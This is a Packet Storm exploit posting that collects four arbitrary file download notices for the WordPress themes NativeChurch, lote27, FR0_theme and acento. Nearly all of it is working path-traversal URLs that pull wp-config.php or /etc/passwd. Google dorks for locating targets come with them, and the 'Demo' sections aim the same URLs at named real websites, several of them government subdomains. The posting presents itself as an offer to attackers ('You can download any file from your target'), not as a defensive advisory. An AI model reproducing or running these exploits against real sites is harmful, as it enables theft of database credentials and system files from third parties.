WordPress NativeChurch / lote27 / FR0_theme / acento File Download

2014-08-31T00:00:00
ID PACKETSTORM:128101
Type packetstorm
Reporter alieye
Modified 2014-08-31T00:00:00

Description

                                        
                                            `#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
# Title : WordPress NativeChurch theme Arbitrary File Download Vulnerability  
# Author : alieye  
#  
# Vendor Homepage :   
# http://themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446  
# http://www.freetemplatefiles.com/nativechurch-multi-purpose-wordpress-theme/  
#   
# Contact : cseye_ut@yahoo.com  
# Risk : High  
# Class: Remote  
# Google Dork: inurl:/wp-content/themes/NativeChurch/  
# Date: 01/09/2014  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
  
You can download any file from your target ;)  
  
  
exploit:   
http://victim.com/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php  
  
  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members  
[#] Thanks To All Iranian Hackers  
[#] website : http://cseye.vcp.ir/  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
# Title : WordPress lote27 theme Arbitrary File Download Vulnerability  
# Author : alieye  
# designer Homepage : http://hyattinforma.com.br/  
# Contact : cseye_ut@yahoo.com  
# Risk : High  
# Class: Remote  
# Date: 01/09/2014  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
  
You can download any file from your target ;)  
  
  
exploit: http://victim.com/site/wp-content/themes/lote27/download.php?download=../../../wp-config.php  
  
  
Demo:  
  
http://www.lote27.com.br/site/wp-content/themes/lote27/download.php?download=../../../wp-config.php  
http://hyattinforma.com.br/site/wp-content/themes/lote27/download.php?download=../../../wp-config.php  
  
  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members  
[#] Thanks To All Iranian Hackers  
[#] website : http://cseye.vcp.ir/  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
# Title : WordPress FR0_theme theme Arbitrary File Download Vulnerability  
# Author : alieye  
# designer Homepage : http://english.gg.go.kr/  
# Contact : cseye_ut@yahoo.com  
# Risk : High  
# Class: Remote  
# Google Dork: inurl:/themes/FR0_theme/  
# Date: 01/09/2014  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
  
You can download any file from your target ;)  
  
  
exploit: http://victim.com/wp-content/themes/FR0_theme/down.php?path=http://victim.com/wp-config.php  
  
  
Demo:  
  
http://greencafe.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://greencafe.gg.go.kr/wp-config.php  
http://gvs.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://gvs.gg.go.kr/wp-config.php  
http://farm.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://farm.gg.go.kr/wp-config.php  
http://fish.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://fish.gg.go.kr/wp-config.php  
http://forest.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://forest.gg.go.kr/wp-config.php  
http://nongup.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://nongup.gg.go.kr/wp-config.php  
http://childfarm.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://childfarm.gg.go.kr/wp-config.php  
  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members  
[#] Thanks To All Iranian Hackers  
[#] website : http://cseye.vcp.ir/  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
# Title : WordPress acento theme Arbitrary File Download Vulnerability  
# Author : alieye  
# vondor : http://www.wpbyexample.com/detail/acentocultural.com  
# Contact : cseye_ut@yahoo.com  
# Risk : High  
# Class: Remote  
# Date: 01/09/2014  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
  
You can download any file from your target ;)  
  
  
exploit: http://victim.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php  
  
  
Demo:  
  
1-download wp-config.php file from site:  
  
http://www.acentocultural.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/homepages/44/d398221315/htdocs/wp-config.php  
  
2-download passwd file from root:  
  
http://www.acentocultural.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/etc/passwd  
  
  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members  
[#] Thanks To All Iranian Hackers  
[#] website : http://cseye.vcp.ir/  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
`